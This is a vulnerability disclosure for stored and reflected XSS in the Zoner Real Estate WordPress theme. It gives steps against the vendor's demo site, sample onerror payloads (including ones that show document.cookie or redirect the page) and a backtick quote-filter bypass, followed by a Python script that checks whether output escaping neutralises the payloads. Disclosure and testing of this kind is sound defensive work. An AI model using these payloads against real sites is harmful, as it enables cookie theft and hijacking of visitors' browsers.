Zoner – Real Estate <= 4.1 – Reflected & Stored XSS
Proof of Concept
PoC (Stored XSS Injection):

Register on the demo website and go to the https://zoner.fruitfulcode.com/author/[your_login]/?profile-page=my_profile page. In any text field, type "> first to «close» the input field, then add your payload and save the data; your code will be successfully injected. For any text box, use </textarea> first instead of "> and then your payload.

Sample payload #1: ">alert('QUIXSS')
Sample payload #2: "><img src="x" onerror="alert('QUIXSS');">
Sample payload #3: "><img src=x onerror=alert('QUIXSS')>

PoC (Reflected XSS Injection):

Go to any page with the «Search Your Property» form, e.g. https://zoner.fruitfulcode.com/home_v/3/, and use your payload inside the «Keyword» input field. Keep in mind that quotes will be filtered, but you can bypass the filter by combining ` quotes with «no quotes» (check the provided samples).

Sample payload #1: "><img src="x" onerror="alert(document.cookie)">
Sample payload #2: "><img src="x" onerror=window.location.replace(`https://twitter.com/quixss`)>
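
An added example, not code from the advisory or the theme: it renders the advisory's payloads into a constructed input/textarea template with and without output escaping, then parses the result to confirm that escaping leaves no injected tag or event handler while the field still shows the user's literal text. Python's `html.escape` stands in for the theme's PHP output escaping (in WordPress, `esc_attr()` and `esc_textarea()`); the template and field names are assumptions.

```python
import html
from html.parser import HTMLParser

# Payloads quoted from the advisory; the </textarea> variant follows its text-box note.
PAYLOADS = [
    '"><img src="x" onerror="alert(\'QUIXSS\');">',
    '"><img src=x onerror=alert(\'QUIXSS\')>',
    '</textarea><img src=x onerror=alert(\'QUIXSS\')>',
    '"><img src="x" onerror=window.location.replace(`https://twitter.com/quixss`)>',
]

def render(value, escape):
    """Constructed template: one attribute context and one textarea context."""
    v = html.escape(value, quote=True) if escape else value
    return (f'<input type="text" name="keyword" value="{v}">\n'
            f'<textarea name="about">{v}</textarea>')

class Audit(HTMLParser):
    """Record markup the template itself never emits, plus the input's value."""
    def __init__(self):
        super().__init__()
        self.findings, self.value = [], None

    def handle_starttag(self, tag, attrs):
        if tag not in ("input", "textarea"):
            self.findings.append(f"unexpected <{tag}>")
        self.findings += [f"{name} handler on <{tag}>"
                          for name, _ in attrs if name.startswith("on")]
        if tag == "input":
            self.value = dict(attrs).get("value")

def audit(markup):
    parser = Audit()
    parser.feed(markup)
    parser.close()
    return parser

if __name__ == "__main__":
    for payload in PAYLOADS:
        raw, safe = audit(render(payload, False)), audit(render(payload, True))
        print(f"{payload!r}\n  unescaped: {raw.findings}\n  escaped:   {safe.findings}"
              f" (field shows original text: {safe.value == payload})")
```

The same audit can be pointed at saved responses from a patched install to check that profile fields and the search keyword come back entity-encoded.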
